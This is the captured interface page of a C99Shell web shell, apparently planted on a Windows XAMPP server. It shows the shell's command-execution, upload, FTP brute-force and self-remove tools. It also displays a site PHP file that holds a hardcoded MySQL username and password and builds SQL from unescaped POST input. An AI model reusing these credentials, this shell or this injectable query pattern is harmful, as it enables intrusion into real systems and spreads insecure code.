!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\login\   drwxrwxrwx
Free 7.97 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     editar_done.php (2.58 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
// Connect to database
echo $_POST['id'];
$id_gestor = $_POST['gestor'];
$errmsg = "";

if (! @mysql_connect("localhost","admin_uno","sda2008")) {
        $errmsg = "No es posible la conexión a la BD";
        }
@mysql_select_db("uno");

//if (($_FILES['imagefile']['type'] == "application/msword") || ($_FILES['imagefile']['type'] == "application/zip") || ($_FILES['imagefile']['type'] == "application/vnd.ms-excel") || ($_FILES['imagefile']['type'] == "text/plain") || ($_FILES['imagefile']['type'] == "application/pdf") && ($file_size < $limit_size)){ 

   /* copy ($_FILES['imagefile']['tmp_name'], "./informacion_local/".$_FILES['imagefile']['name'])
    or die ("No se pudo copiar"); 
    chmod ("./informacion_local/".$_FILES['imagefile']['name'], 0666);
        echo "";
        $fecha = date("Y-m-d");
        $lugar = $_POST['lugar'];
        $comm = $_POST['comm'];
        $imagen =$HTTP_POST_FILES['imagefile']['name'];
        echo "Name: ".$_FILES['imagefile']['name']."<br>";
        echo "Size: ".$_FILES['imagefile']['size']."<br>";
        echo "Type: ".$_FILES['imagefile']['type']."<br>";
        echo "<br>Archivo publicado....<br><br>";
        */    
$fuente = $_POST['dependencia'];
$anexos = "./informacion_local/".$_FILES['imagefile']['name'];
$situacion= $_POST['situacion'];
$descripcion = $_POST['descripcion'];
$localidad = $_POST['localidad'];
$territorio = $_POST['territorio'];
$upz = $_POST['upz'];
$acciones = $_POST['avances'];
$entidad = $_POST['entidad'];
$acciones_otras = $_POST['acciones_otras'];
$ejecutora = $_POST['ejecutora'];
$recomendaciones = $_POST['impactos'];
$observaciones = $_POST['observaciones'];
$id_campo = $_POST['id_campo'];
$id_gestor =  $_POST['id_gestor'];
$fecha = $_POST['fecha'];

$query1 = "update informacion_local2 set observaciones='$observaciones' where id = '4' and id_gestor='212'";

/*$query1 = "update informacion_local2 set id='$id_campo', situacion ='$situacion',descripcion='$descripcion',
localidad='$localidad', territorio='$territorio', upz='$upz', acciones ='$acciones', entidad='$entidad', acciones_otras='$acciones_otras',
ejecutora='$ejecutora', recomendaciones ='$recomendaciones', observaciones ='$observaciones', fecha = '$fecha' where id = '$id_campo' and id_gestor='$id_gestor')";
*/
$result1 = mysql_query ($query1);        
echo "<bR>La información ha quedado actualizada exitosamente<p></p><p></p><br><br>";    
        
    /*    } 
        else {
            echo "<br><br>";
            echo "No fue posible la copia, tipo de archivo incorrecto (".$_FILES['imagefile']['name'].") o excede el tamaño permitido)<br>";
        }
        */

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--